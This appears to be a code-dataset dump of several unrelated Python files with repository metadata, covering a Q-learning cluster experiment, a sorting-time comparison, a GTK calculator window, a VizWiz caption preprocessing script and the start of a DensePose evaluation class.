79544f059d74b07d8db41f9744080b82352b18e7 | 6,392 | py | Python | contents/MyExperiment/Exp3_test/run_this.py | Feng-XiaoYue/Reinforcement-learning-with-tensorflow-master | 011594083410f9b2f8e16eb5deed26e730ed849e | [
"MIT"
] | null | null | null | contents/MyExperiment/Exp3_test/run_this.py | Feng-XiaoYue/Reinforcement-learning-with-tensorflow-master | 011594083410f9b2f8e16eb5deed26e730ed849e | [
"MIT"
] | null | null | null | contents/MyExperiment/Exp3_test/run_this.py | Feng-XiaoYue/Reinforcement-learning-with-tensorflow-master | 011594083410f9b2f8e16eb5deed26e730ed849e | [
"MIT"
] | null | null | null | from .cluster_env import Cluster
from .RL_brain import QLearningTable
import datetime
import numpy as np
import matplotlib.pyplot as plt
import pylab as pl
import random
import pandas as pd
import time
from pandas.testing import assert_frame_equal
def state_init():
    """Build a random initial placement state.

    Returns a 12x4 DataFrame of 0/1 values where each row has exactly one
    randomly chosen column set to 1.

    :return: the initial state matrix
    :rtype: pandas.DataFrame
    """
    init_state = pd.DataFrame(np.zeros(12*4).reshape(12, 4), columns=[0, 1, 2, 3])
    for i in range(len(init_state)):
        j = random.randint(0, 3)
        # BUG FIX: use a single .iloc[row, col] assignment instead of the
        # chained init_state.iloc[i][j] = 1, which writes to a temporary
        # Series and may not update the DataFrame at all.
        init_state.iloc[i, j] = 1
    return init_state
def server_attribute():
    """Randomly assign 12 distinct attributes across 4 servers.

    Returns a 4x12 DataFrame of 0/1 values where each row (server) has
    exactly three columns (attributes) set to 1 and every attribute is
    assigned to exactly one server.

    :return: the server/attribute assignment matrix
    :rtype: pandas.DataFrame
    """
    init_state = pd.DataFrame(np.zeros(4*12).reshape(4, 12), columns=np.arange(12))
    server = []
    attribute_list = range(len(init_state.columns))
    for i in range(len(init_state)):
        # drop the attributes taken by the previous server so every
        # attribute ends up assigned exactly once overall (4 rows x 3 = 12)
        attribute_list = list(set(attribute_list).difference(set(server)))
        server = random.sample(attribute_list, 3)
        for j in server:
            # BUG FIX: single .iloc[row, col] assignment instead of the
            # chained init_state.iloc[i][j] = 1 (writes to a temporary
            # Series and may not update the DataFrame).
            init_state.iloc[i, j] = 1
    return init_state
def update():
    """Run the Q-learning training loop over all episodes.

    Relies on module-level globals created in ``__main__``: ``env`` (Cluster),
    ``RL`` (QLearningTable), ``episodes`` (iterable of episode indices) and
    ``init_reward`` (reward of the initial state).

    Returns:
        tuple: (cost_all_list, reward_all_list) -- the final cost of every
        episode, and the final reward sampled once every 100 episodes.
    """
    cost_all_list = []
    reward_all_list = []
    query_number = len(env.QSs)  # only used by the commented print below
    # print(query_number)
    for episode in episodes:
        epoch_curr_time1 = datetime.datetime.now()
        # initial state
        state_init_arr = env.state_array(env.state_init)
        state = (env.state_init).copy()
        costs = env.cost_init
        sum = 0  # NOTE: shadows the builtin; counts inner-loop iterations
        reward_list = [0]
        state_arr_for_one = state_init_arr
        reward = init_reward
        while True:
            # RL choose action based on observation
            # The action here is a number(the index of the real action)
            action = RL.choose_action(str(state_arr_for_one))
            # RL take action and get next observation and reward
            state_, costs_, reward_, cost_all, is_better = env.step(action, state, costs)
            state__arr = env.state_array(state_)
            # Entries of the new state array that were not in the previous one.
            different = [y for y in (state_arr_for_one + state__arr) if y not in state_arr_for_one]
            print("different:", different)
            # Episode terminates when the reward drops below every value seen
            # so far, or when the action left the state unchanged while still
            # improving on both the previous and the initial reward.
            if ((reward_ < init_reward and reward_ < min(reward_list) or
                 (len(different) == 0 and reward_ >= reward and reward_ > (init_reward)))):
                done = True
            else:
                done = False
            # RL learn from this transition
            print("done:", done)
            # Shaped reward: -1 for a new global worst, +1 for a stable
            # improvement, 0 otherwise.
            if ((reward_ < init_reward) and (reward_ < min(reward_list))):
                re = -1
                print("reward值小于初始值或并且该循环的最小值")
            elif len(different) == 0 and reward_ >= reward and reward_ > (init_reward):
                re = 1
                print("reward值大于前一个循环的reward值并且采取动作后状态不改变")
            else:
                re = 0
            reward = reward_
            reward_list.append(reward)
            RL.learn(str(state_arr_for_one), action, re, str(state__arr), done)
            state_arr_for_one = state__arr
            different_init = [y for y in (state_init_arr + state__arr) if y not in state_init_arr]
            costs = costs_
            # q_table=RL.q_table.copy()
            state = state_
            sum += 1
            if done:
                break
        # Sample the reward curve once every 100 episodes.
        if (episode+1) % 100 == 0:
            reward_all_list.append(reward)
        epoch_curr_time2 = datetime.datetime.now()
        epoch_time = epoch_curr_time2 - epoch_curr_time1
        # if (action in actions and q_table.loc[str(state), action] >= 0) and (done and q_table.loc[str(state), action] >= 0 and reward > 0):
        #     break
        # else:
        #     actions.append(action)
        # break while loop when end of this episode
        # if done and q_table.loc[str(state),action]!=0:
        #     break
        cost_all_list.append(cost_all)
        print("epoch:", episode+1)
        print("The number of cycles in this epoch:", sum)
        print("The reward list:", reward_list)
        print("The best reward in this epoch:", max(reward_list))
        print("The final reward in this epoch:", reward)
        print("The final cost in this epoch:", cost_all)
        print("当前状态与初始状态的差别", (different_init))
        print("当前状态与初始状态的差别数", len(different_init))
        print("epoch_time:", epoch_time, "\n")
    # end of game
    # print("final state:\n",state)
    print("------------------------")
    print("The final state_array:", state__arr)
    print("The final cost:", cost_all)
    # if state.equals(env.state_init):
    #     print("True")
    # else:
    #     print("False")
    # assert_frame_equal(state,env.state_init)
    # env.destroy()
    return cost_all_list, reward_all_list
if __name__ == "__main__":
    # Script entry point: build the environment, train, then plot the
    # reward curve against the initial-reward baseline.
    improve_list = []
    test_number = 50
    # NOTE: rebinds the name state_init from the function to its result.
    state_init = state_init()
    # for i in range(50):
    #     print("第%d次测试:" % (i+1))
    episodes = np.arange(20000)
    curr_time1 = datetime.datetime.now()
    # print(len(state_init))
    # Fixed 4x12 server/attribute incidence matrix (3 attributes per server).
    server_attribute = pd.DataFrame(np.array([0, 0, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0,
                                              0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0,
                                              1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0,
                                              0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1]).
                                    reshape(4, 12),
                                    columns=np.arange(12))
    env = Cluster(state_init, server_attribute)
    init_reward = env.reward(env.cost_all(env.cost_init), env.state_init)
    RL = QLearningTable(actions=list(range(env.n_actions)))
    # env.after(100, update)
    # env.mainloop()
    cost_all_list, reward_all_list = update()
    print("len(reward_all_list)", len(reward_all_list))
    curr_time2 = datetime.datetime.now()
    train_time = curr_time2-curr_time1
    print("The training time:", train_time)
    print("\n")
    # Relative improvement of the final sampled reward over the initial one.
    improve = ((reward_all_list[-1] - init_reward)/init_reward)*100
    print("The improve percent:", improve, "%")
    improve_list.append(improve)
    y_1 = reward_all_list
    y_all_list = y_1
    # reward_all_list holds one sample per 100 episodes, hence the x scaling.
    x = (np.arange(len(y_all_list))+1)*100
    y = y_all_list
    y1 = [init_reward]*len(x)  # flat baseline at the initial reward
    fig = plt.Figure(figsize=(7, 5))
    pl.plot(x, y, label=u'RL')
    pl.legend()
    pl.plot(x, y1, label=u'Init')
    pl.legend()
    pl.xlabel(u"epoch", size=14)
    pl.ylabel(u"reward", size=14)
    plt.show()
    # y = improve_list
    # x = np.arange(test_number)
    # fig = plt.Figure(figsize=(7, 5))
    # pl.plot(x, y, label=u'Improve')
    # pl.legend()
    # plt.show()
79545033756f34edaa344527e0762a3514ed038a | 446 | py | Python | AlgorithmsComparison/Time.py | mahmoudShaheen/RandomCollegeProjects | 6bcede0ad8b09ac738d8f49e6fed6d2b7a111cfd | [
"MIT"
] | null | null | null | AlgorithmsComparison/Time.py | mahmoudShaheen/RandomCollegeProjects | 6bcede0ad8b09ac738d8f49e6fed6d2b7a111cfd | [
"MIT"
] | null | null | null | AlgorithmsComparison/Time.py | mahmoudShaheen/RandomCollegeProjects | 6bcede0ad8b09ac738d8f49e6fed6d2b7a111cfd | [
"MIT"
] | null | null | null | from insertion import insertion_sort
from merge import merge_sort
import random
import time
if __name__ == '__main__':
items=[random.randint(-50,100) for c in range (1000)]
items2 = items
start = time.time()
insertion_sort(items)
insertiontime = time.time()-start
print "Insertion Sort Time = " , insertiontime
merge_sort(items2)
mergetime = time.time()-insertiontime
print "Merge Sort Time = " , mergetime
| 24.777778 | 57 | 0.701794 |
79545034b7eb157c095c153d3aca72f2b70189ff | 4,427 | py | Python | gtimecalc/main_window.py | danpla/gtimecalc | 5f160a2d7c878db301c5d7e4e439a349949ec679 | [
"Zlib"
] | null | null | null | gtimecalc/main_window.py | danpla/gtimecalc | 5f160a2d7c878db301c5d7e4e439a349949ec679 | [
"Zlib"
] | null | null | null | gtimecalc/main_window.py | danpla/gtimecalc | 5f160a2d7c878db301c5d7e4e439a349949ec679 | [
"Zlib"
] | null | null | null |
from gettext import gettext as _
import struct
from gi.repository import Gtk, Gdk, Gio, GLib
from . import app_info
from .settings import settings
from .common import WIDGET_SPACING
from .calculator import Calculator
from .notebook import Notebook
_C_INT_MAX = 2 ** (struct.Struct('i').size * 8 - 1) - 1
class MainWindow(Gtk.ApplicationWindow):
    """Top-level application window: menu bar, calculator, and an optional
    equation notebook whose visibility is driven by a stateful Gio action."""

    def __init__(self, app):
        """Build the widget tree and register the 'notebook-visible' action.

        :param app: the Gtk.Application owning this window.
        """
        super().__init__(
            application=app,
            title=app_info.TITLE
        )

        self._maximized = False  # tracked via do_window_state_event

        grid = Gtk.Grid(
            orientation=Gtk.Orientation.VERTICAL
        )
        self.add(grid)

        grid.add(self._create_menubar())

        self._calculator = Calculator()
        self._calculator.props.margin = WIDGET_SPACING
        grid.add(self._calculator)

        self._notebook = Notebook(self._calculator)
        grid.add(self._notebook)

        grid.show_all()
        # Notebook starts hidden; load_state() may re-show it later.
        self._notebook.hide()

        # Stateful boolean action mirroring the notebook's visibility;
        # toggled from the View menu ('win.notebook-visible').
        notebook_visible_action = Gio.SimpleAction.new_stateful(
            'notebook-visible',
            None,
            GLib.Variant.new_boolean(self._notebook.get_visible()),
        )
        notebook_visible_action.connect(
            'change-state', self._on_notebook_visible_toggle)
        self.add_action(notebook_visible_action)

    def _create_menubar(self):
        """Create the File/View/Help menu bar (with Ctrl+Q accelerator)."""
        ag = Gtk.AccelGroup()
        self.add_accel_group(ag)

        menubar = Gtk.MenuBar()

        # File
        file_menu = Gtk.Menu()
        mi_file = Gtk.MenuItem.new_with_mnemonic(_('_File'))
        mi_file.set_submenu(file_menu)
        menubar.append(mi_file)

        mi_quit = Gtk.MenuItem(
            label=_('Quit'),
            action_name='app.quit')
        key, mod = Gtk.accelerator_parse('<Control>Q')
        mi_quit.add_accelerator(
            'activate', ag, key, mod, Gtk.AccelFlags.VISIBLE)
        file_menu.append(mi_quit)

        # View
        view_menu = Gtk.Menu()
        mi_view = Gtk.MenuItem.new_with_mnemonic(_('_View'))
        mi_view.set_submenu(view_menu)
        menubar.append(mi_view)

        mi_show_equations = Gtk.CheckMenuItem(
            label=_('Equations'),
            action_name='win.notebook-visible')
        view_menu.append(mi_show_equations)

        # Help
        help_menu = Gtk.Menu()
        mi_help = Gtk.MenuItem.new_with_mnemonic(_('_Help'))
        mi_help.set_submenu(help_menu)
        menubar.append(mi_help)

        mi_about = Gtk.MenuItem(
            label=_('About'),
            action_name='app.about')
        help_menu.append(mi_about)

        return menubar

    # NOTE(review): method name has a typo ("udpate"); kept as-is since it is
    # referenced by _on_notebook_visible_toggle below.
    def _udpate_geometry_hints(self):
        """Cap the window's max height when the notebook is hidden, so the
        window cannot be resized vertically beyond its natural size."""
        geometry = Gdk.Geometry()
        geometry.max_width = _C_INT_MAX
        if self._notebook.get_visible():
            geometry.max_height = _C_INT_MAX
        else:
            geometry.max_height = -1
        self.set_geometry_hints(None, geometry, Gdk.WindowHints.MAX_SIZE)

    def _on_notebook_visible_toggle(self, action, value):
        """'change-state' handler: sync notebook visibility with the action."""
        action.set_state(value)
        self._notebook.set_visible(value.get_boolean())
        self._udpate_geometry_hints()

    def do_window_state_event(self, event):
        """Track the maximized flag for save_state(), then chain up."""
        self._maximized = bool(
            event.new_window_state & Gdk.WindowState.MAXIMIZED)
        return Gtk.ApplicationWindow.do_window_state_event(self, event)

    def do_delete_event(self, event):
        """Persist window state on close; propagate so the window still closes."""
        self.save_state()
        return Gdk.EVENT_PROPAGATE

    def save_state(self):
        """Write window geometry and notebook visibility to settings, and
        ask the child widgets to persist their own state."""
        state = {}

        notebook_visible_state = self.get_action_state('notebook-visible')
        state['show_equations'] = notebook_visible_state.get_boolean()

        state['x'], state['y'] = self.get_position()
        state['width'], state['height'] = self.get_size()
        state['maximized'] = self._maximized

        settings['window'] = state

        self._calculator.save_state()
        self._notebook.save_state()

    def load_state(self):
        """Restore child-widget state, then window geometry and notebook
        visibility; missing/malformed settings are silently ignored."""
        self._calculator.load_state()
        self._notebook.load_state()

        try:
            state = settings['window']
            if state['maximized']:
                self.maximize()
            else:
                self.move(state['x'], state['y'])
                self.resize(
                    state['width'], state['height'])
            self.change_action_state(
                'notebook-visible',
                GLib.Variant.new_boolean(state['show_equations']))
        except (KeyError, TypeError):
            # First run or corrupted settings: keep defaults.
            pass
795450bd826ba6f14b9211ede68f06d2e6f78b44 | 11,746 | py | Python | scripts/prepro_labels_vizwiz.py | Yinan-Zhao/AoANet | f0070931e0121c473d9a36b66d4c85b090c47c85 | [
"MIT"
] | null | null | null | scripts/prepro_labels_vizwiz.py | Yinan-Zhao/AoANet | f0070931e0121c473d9a36b66d4c85b090c47c85 | [
"MIT"
] | null | null | null | scripts/prepro_labels_vizwiz.py | Yinan-Zhao/AoANet | f0070931e0121c473d9a36b66d4c85b090c47c85 | [
"MIT"
] | null | null | null | """
Preprocess a raw json dataset into hdf5/json files for use in data_loader.lua
Input: json file that has the form
[{ file_path: 'path/img.jpg', captions: ['a caption', ...] }, ...]
example element in this list would look like
{'captions': [u'A man with a red helmet on a small moped on a dirt road. ', u'Man riding a motor bike on a dirt road on the countryside.', u'A man riding on the back of a motorcycle.', u'A dirt path with a young person on a motor bike rests to the foreground of a verdant area with a bridge and a background of cloud-wreathed mountains. ', u'A man in a red shirt and a red hat is on a motorcycle on a hill side.'], 'file_path': u'val2014/COCO_val2014_000000391895.jpg', 'id': 391895}
This script reads this json, does some basic preprocessing on the captions
(e.g. lowercase, etc.), creates a special UNK token, and encodes everything to arrays
Output: a json file and an hdf5 file
The hdf5 file contains several fields:
/images is (N,3,256,256) uint8 array of raw image data in RGB format
/labels is (M,max_length) uint32 array of encoded labels, zero padded
/label_start_ix and /label_end_ix are (N,) uint32 arrays of pointers to the
first and last indices (in range 1..M) of labels for each image
/label_length stores the length of the sequence for each of the M sequences
The json file has a dict that contains:
- an 'ix_to_word' field storing the vocab in form {ix:'word'}, where ix is 1-indexed
- an 'images' field that is a list holding auxiliary information for each image,
such as in particular the 'split' it was assigned to.
"""
### source activate py2.7 ###
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import json
import sys
import re
import argparse
from random import shuffle, seed
import string
# non-standard dependencies:
import h5py
import numpy as np
import skimage.io
from PIL import Image
sys.path.append('/home/yz9244/Up-Down-Captioner/external/coco/PythonAPI/')
from pycocotools.coco import COCO
VizWiz_ANN_PATH = '/home/yz9244/Up-Down-Captioner/bottom-up-attention/data/VizWiz/annotations/'
COCO_TRAIN_VOCAB_PATH = '/home/yz9244/AoANet/data/cocotalk_vocab.json'
corrupt_list = [37093]
SENTENCE_SPLIT_REGEX = re.compile(r'(\W+)') # Split on any non-alphanumeric character

def split_sentence(sentence):
    """Break a caption into a list of lowercase words and punctuation tokens.

    Punctuation-only tokens are split into single characters, except runs of
    full stops ('..', '...') which are kept whole. A single trailing '.' is
    dropped (it is the EOS token populated by the data layer).

    Args:
        sentence (str): raw caption text.

    Returns:
        list of str tokens (possibly empty).
    """
    toks = []
    for word in [s.strip().lower() for s in SENTENCE_SPLIT_REGEX.split(sentence.strip()) if len(s.strip()) > 0]:
        # Break up any words containing punctuation only, e.g. '!?', unless it is multiple full stops e.g. '..'
        if all(c in string.punctuation for c in word) and not all(c in '.' for c in word):
            toks += list(word)
        else:
            toks.append(word)
    # Remove '.' from the end of the sentence -
    # this is EOS token that will be populated by data layer.
    # BUG FIX: guard against empty/whitespace-only captions, which produced
    # no tokens and made toks[-1] raise IndexError in the original.
    if not toks or toks[-1] != '.':
        return toks
    return toks[:-1]
def load_caption_vocab(vocab_path=COCO_TRAIN_VOCAB_PATH):
    """Load a 1-indexed ix->word vocabulary json and return it as a list.

    Args:
        vocab_path: path to a json file containing an 'ix_to_word' dict whose
            keys are the strings '1'..'N'.

    Returns:
        list of words such that vocab[i] is the word with index i+1.
    """
    # Use a context manager so the file handle is closed deterministically
    # (the original json.load(open(...)) left closing to the garbage collector).
    with open(vocab_path) as f:
        info = json.load(f)
    ix_to_word = info['ix_to_word']
    # Rebuild the list in index order; keys are 1-based strings.
    return [ix_to_word[str(i + 1)] for i in range(len(ix_to_word))]
def build_vocab(params, data_split, base_vocab=None):
    """Count word frequencies over VizWiz caption splits and build a vocab.

    Words occurring more than params['word_count_threshold'] times are kept;
    an 'UNK' token is appended. If base_vocab is given, its words (minus any
    trailing 'UNK') are placed first and new words are appended after them.

    Args:
        params (dict): needs 'word_count_threshold'.
        data_split (list of str): dataset splits, e.g. ['train', 'val'].
        base_vocab (str or None): optional path to a base vocab json.

    Returns:
        list of str: the final vocabulary.
    """
    count_thr = params['word_count_threshold']
    counts = {}
    for dataset in data_split: # coco sources
        annFile='%s/VizWiz_Captions_v1_%s.json' % (VizWiz_ANN_PATH, dataset)
        coco = COCO(annFile)
        # Count word frequencies
        for image_id,anns in coco.imgToAnns.iteritems():
            # Skip images known to be corrupt.
            if image_id in corrupt_list:
                continue
            for ann in anns:
                caption_sequence = split_sentence(ann['caption'])
                for word in caption_sequence:
                    w = word.strip()
                    counts[w] = counts.get(w, 0) + 1
    # count up the number of words
    cw = sorted([(count,w) for w,count in counts.items()], reverse=True)
    print('top words and their counts:')
    print('\n'.join(map(str,cw[:20])))
    # print some stats
    total_words = sum(counts.values())
    print('total words:', total_words)
    bad_words = [w for w,n in counts.items() if n <= count_thr]
    vocab = [w for w,n in counts.items() if n > count_thr]
    bad_count = sum(counts[w] for w in bad_words)
    print('number of bad words: %d/%d = %.2f%%' % (len(bad_words), len(counts), len(bad_words)*100.0/len(counts)))
    print('number of words in vocab would be %d' % (len(vocab), ))
    print('number of UNKs: %d/%d = %.2f%%' % (bad_count, total_words, bad_count*100.0/total_words))
    # lets look at the distribution of lengths as well
    sent_lengths = {}
    for dataset in data_split: # coco sources
        annFile='%s/VizWiz_Captions_v1_%s.json' % (VizWiz_ANN_PATH, dataset)
        coco = COCO(annFile)
        # Count word frequencies
        for image_id,anns in coco.imgToAnns.iteritems():
            if image_id in corrupt_list:
                continue
            for ann in anns:
                caption_sequence = split_sentence(ann['caption'])
                nw = len(caption_sequence)
                sent_lengths[nw] = sent_lengths.get(nw, 0) + 1
    max_len = max(sent_lengths.keys())
    print('max length sentence in raw data: ', max_len)
    print('sentence length distribution (count, number of words):')
    sum_len = sum(sent_lengths.values())
    for i in range(max_len+1):
        print('%2d: %10d %f%%' % (i, sent_lengths.get(i,0), sent_lengths.get(i,0)*100.0/sum_len))
    # lets now produce the final annotations
    # additional special UNK token we will use below to map infrequent words to
    print('inserting the special UNK token')
    vocab.append('UNK')
    if base_vocab:
        vocabulary = load_caption_vocab(vocab_path=base_vocab)
        # Drop the base vocab's trailing UNK; ours is appended from `vocab`.
        if vocabulary[-1] == 'UNK':
            vocabulary.pop()
    else:
        vocabulary = []
    offset = len(vocabulary)
    print("number of words in the base vocab: %d\n" % (offset))
    # Append only words not already present in the base vocabulary.
    for word in vocab:
        if word in vocabulary:
            continue
        vocabulary.append(word)
        offset += 1
    print("number of words in the final vocab: %d\n" % (offset))
    return vocabulary
def encode_captions(params, data_split, wtoi):
    """
    encode all captions into one large array, which will be 1-indexed.
    also produces label_start_ix and label_end_ix which store 1-indexed
    and inclusive (Lua-style) pointers to the first and last caption for
    each image in the dataset.
    """
    max_length = params['max_length']

    # First pass: count images and captions so the arrays can be pre-sized.
    img_count = 0
    caption_count = 0
    for dataset in data_split:
        annFile='%s/VizWiz_Captions_v1_%s.json' % (VizWiz_ANN_PATH, dataset)
        coco = COCO(annFile)
        for image_id,anns in coco.imgToAnns.iteritems():
            if image_id in corrupt_list:
                continue
            img_count += 1
            caption_count += len(anns)
    N = img_count
    M = caption_count # total number of captions
    label_arrays = []
    label_start_ix = np.zeros(N, dtype='uint32') # note: these will be one-indexed
    label_end_ix = np.zeros(N, dtype='uint32')
    label_length = np.zeros(M, dtype='uint32')
    caption_counter = 0
    counter = 1
    img_counter = 0
    imgInfo = []
    # Second pass: encode every caption and record per-image metadata.
    for dataset in data_split:
        annFile='%s/VizWiz_Captions_v1_%s.json' % (VizWiz_ANN_PATH, dataset)
        coco = COCO(annFile)
        for image_id,anns in coco.imgToAnns.iteritems():
            if image_id in corrupt_list:
                continue
            image_info = coco.imgs[image_id]
            #image_path = '%s/%s' % (image_info['file_name'].split('_')[1], image_info['file_name'])
            image_path = '%s' % (image_info['file_name'])
            jimg = {}
            # VizWiz 'val' images are folded into the training split.
            if dataset == 'train' or dataset == 'val':
                jimg['split'] = 'train'
            elif dataset == 'test':
                jimg['split'] = 'test'
            jimg['file_path'] = image_path
            jimg['id'] = image_info['id']
            n = len(anns)
            assert n > 0, 'error: some image has no captions'
            Li = np.zeros((n, max_length), dtype='uint32')
            for j, ann in enumerate(anns):
                caption_sequence = split_sentence(ann['caption'])
                label_length[caption_counter] = min(max_length, len(caption_sequence))
                caption_counter += 1
                for k,w in enumerate(caption_sequence):
                    if k < max_length:
                        # Out-of-vocabulary words map to the UNK token.
                        if not w in wtoi:
                            w = 'UNK'
                        Li[j,k] = wtoi[w]
            # note: word indices are 1-indexed, and captions are padded with zeros
            label_arrays.append(Li)
            label_start_ix[img_counter] = counter
            label_end_ix[img_counter] = counter + n - 1
            img_counter += 1
            counter += n
            imgInfo.append(jimg)
    L = np.concatenate(label_arrays, axis=0) # put all the labels together
    assert L.shape[0] == M, 'lengths don\'t match? that\'s weird'
    assert np.all(label_length > 0), 'error: some caption had no words?'
    print('encoded captions to array of size ', L.shape)
    return N, L, label_start_ix, label_end_ix, label_length, imgInfo
def main(params):
    """Build VizWiz vocabularies and encoded caption arrays, and write them
    to HDF5 + json outputs -- once with a VizWiz-only vocab and once with a
    vocab that extends the MSCOCO training vocabulary."""
    seed(123) # make reproducible
    # create the vocab
    vocab = build_vocab(params, ['train', 'val'])
    itow = {i+1:w for i,w in enumerate(vocab)} # a 1-indexed vocab translation table
    wtoi = {w:i+1 for i,w in enumerate(vocab)} # inverse table
    # encode captions in large arrays, ready to ship to hdf5 file
    N, L, label_start_ix, label_end_ix, label_length, imgInfo = encode_captions(params, ['train', 'val', 'test'], wtoi)
    # create output h5 file
    f_lb = h5py.File(params['output_h5']+'_label.h5', "w")
    f_lb.create_dataset("labels", dtype='uint32', data=L)
    f_lb.create_dataset("label_start_ix", dtype='uint32', data=label_start_ix)
    f_lb.create_dataset("label_end_ix", dtype='uint32', data=label_end_ix)
    f_lb.create_dataset("label_length", dtype='uint32', data=label_length)
    f_lb.close()
    # create output json file
    out = {}
    out['ix_to_word'] = itow # encode the (1-indexed) vocab
    out['images'] = imgInfo
    json.dump(out, open(params['output_json']+'.json', 'w'))
    print('wrote ', params['output_json']+'.json')
    # create the vocab integrating MSCOCO
    vocab = build_vocab(params, ['train', 'val'], base_vocab=COCO_TRAIN_VOCAB_PATH)
    itow = {i+1:w for i,w in enumerate(vocab)} # a 1-indexed vocab translation table
    wtoi = {w:i+1 for i,w in enumerate(vocab)} # inverse table
    # encode captions in large arrays, ready to ship to hdf5 file
    N, L, label_start_ix, label_end_ix, label_length, imgInfo = encode_captions(params, ['train', 'val', 'test'], wtoi)
    # create output h5 file (second variant, COCO-compatible word indices)
    f_lb = h5py.File(params['output_h5']+'_withCOCO_label.h5', "w")
    f_lb.create_dataset("labels", dtype='uint32', data=L)
    f_lb.create_dataset("label_start_ix", dtype='uint32', data=label_start_ix)
    f_lb.create_dataset("label_end_ix", dtype='uint32', data=label_end_ix)
    f_lb.create_dataset("label_length", dtype='uint32', data=label_length)
    f_lb.close()
    # create output json file
    out = {}
    out['ix_to_word'] = itow # encode the (1-indexed) vocab
    out['images'] = imgInfo
    json.dump(out, open(params['output_json']+'_withCOCO.json', 'w'))
    print('wrote ', params['output_json']+'_withCOCO.json')
if __name__ == "__main__":
    # Command-line entry point: parse options and run the preprocessing.
    parser = argparse.ArgumentParser()
    # input json
    parser.add_argument('--output_json', default='data/vizwiztalk', help='output json file')
    parser.add_argument('--output_h5', default='data/vizwiztalk', help='output h5 file')
    parser.add_argument('--images_root', default='', help='root location in which images are stored, to be prepended to file_path in input json')
    # options
    parser.add_argument('--max_length', default=16, type=int, help='max length of a caption, in number of words. captions longer than this get clipped.')
    parser.add_argument('--word_count_threshold', default=5, type=int, help='only words that occur more than this number of times will be put in vocab')
    args = parser.parse_args()
    params = vars(args) # convert to ordinary dict
    print('parsed input parameters:')
    print(json.dumps(params, indent = 2))
    main(params)
| 40.926829 | 483 | 0.693002 |
7954516a71d606bef1c136ae7aa4dadc8bac0938 | 52,557 | py | Python | projects/DensePose/densepose/densepose_coco_evaluation.py | charliememory/detectron2 | a2a6220068e73c616ee4c84cb52ea023c0203fa0 | [
"Apache-2.0"
] | null | null | null | projects/DensePose/densepose/densepose_coco_evaluation.py | charliememory/detectron2 | a2a6220068e73c616ee4c84cb52ea023c0203fa0 | [
"Apache-2.0"
] | null | null | null | projects/DensePose/densepose/densepose_coco_evaluation.py | charliememory/detectron2 | a2a6220068e73c616ee4c84cb52ea023c0203fa0 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
# This is a modified version of cocoeval.py where we also have the densepose evaluation.
__author__ = "tsungyi"
import copy, pdb
import datetime
import logging
import numpy as np
import pickle
import time
from collections import defaultdict
from enum import Enum
from typing import Any, Dict, Tuple
import scipy.spatial.distance as ssd
from pycocotools import mask as maskUtils
from scipy.io import loadmat
from scipy.ndimage import zoom as spzoom
from detectron2.utils.file_io import PathManager
from densepose.structures.mesh import create_mesh
from .data.structures import DensePoseDataRelative
logger = logging.getLogger(__name__)
class DensePoseEvalMode(str, Enum):
    """How detections are scored against ground truth during evaluation."""

    GPSM = "gpsm"  # combine geodesic point similarity with mask IoU (GPS * IOU)
    GPS = "gps"    # geodesic point similarity only
    IOU = "iou"    # mask IoU only
class DensePoseDataMode(str, Enum):
    """Which IUV data (estimated vs ground truth) is fed into the evaluation."""

    IUV_DT = "iuvdt"        # estimated IUV data (default mode)
    IUV_GT = "iuvgt"        # ground truth IUV data
    I_GT_UV_0 = "igtuv0"    # ground truth labels I, UV forced to 0
    I_GT_UV_DT = "igtuvdt"  # ground truth labels I, estimated UV coordinates
    I_DT_UV_0 = "idtuv0"    # estimated labels I, UV forced to 0
class DensePoseCocoEval(object):
# Interface for evaluating detection on the Microsoft COCO dataset.
#
# The usage for CocoEval is as follows:
# cocoGt=..., cocoDt=... # load dataset and results
# E = CocoEval(cocoGt,cocoDt); # initialize CocoEval object
# E.params.recThrs = ...; # set parameters as desired
# E.evaluate(); # run per image evaluation
# E.accumulate(); # accumulate per image results
# E.summarize(); # display summary metrics of results
# For example usage see evalDemo.m and http://mscoco.org/.
#
# The evaluation parameters are as follows (defaults in brackets):
# imgIds - [all] N img ids to use for evaluation
# catIds - [all] K cat ids to use for evaluation
# iouThrs - [.5:.05:.95] T=10 IoU thresholds for evaluation
# recThrs - [0:.01:1] R=101 recall thresholds for evaluation
# areaRng - [...] A=4 object area ranges for evaluation
# maxDets - [1 10 100] M=3 thresholds on max detections per image
# iouType - ['segm'] set iouType to 'segm', 'bbox', 'keypoints' or 'densepose'
# iouType replaced the now DEPRECATED useSegm parameter.
# useCats - [1] if true use category labels for evaluation
# Note: if useCats=0 category labels are ignored as in proposal scoring.
# Note: multiple areaRngs [Ax2] and maxDets [Mx1] can be specified.
#
# evaluate(): evaluates detections on every image and every category and
# concats the results into the "evalImgs" with fields:
# dtIds - [1xD] id for each of the D detections (dt)
# gtIds - [1xG] id for each of the G ground truths (gt)
# dtMatches - [TxD] matching gt id at each IoU or 0
# gtMatches - [TxG] matching dt id at each IoU or 0
# dtScores - [1xD] confidence of each dt
# gtIgnore - [1xG] ignore flag for each gt
# dtIgnore - [TxD] ignore flag for each dt at each IoU
#
# accumulate(): accumulates the per-image, per-category evaluation
# results in "evalImgs" into the dictionary "eval" with fields:
# params - parameters used for evaluation
# date - date evaluation was performed
# counts - [T,R,K,A,M] parameter dimensions (see above)
# precision - [TxRxKxAxM] precision for every evaluation setting
# recall - [TxKxAxM] max recall for every evaluation setting
# Note: precision and recall==-1 for settings with no gt objects.
#
# See also coco, mask, pycocoDemo, pycocoEvalDemo
#
# Microsoft COCO Toolbox. version 2.0
# Data, paper, and tutorials available at: http://mscoco.org/
# Code written by Piotr Dollar and Tsung-Yi Lin, 2015.
# Licensed under the Simplified BSD License [see coco/license.txt]
def __init__(
self,
cocoGt=None,
cocoDt=None,
iouType: str = "densepose",
dpEvalMode: DensePoseEvalMode = DensePoseEvalMode.GPS,
dpDataMode: DensePoseDataMode = DensePoseDataMode.IUV_DT,
):
"""
Initialize CocoEval using coco APIs for gt and dt
:param cocoGt: coco object with ground truth annotations
:param cocoDt: coco object with detection results
:return: None
"""
self.cocoGt = cocoGt # ground truth COCO API
self.cocoDt = cocoDt # detections COCO API
self._dpEvalMode = dpEvalMode
self._dpDataMode = dpDataMode
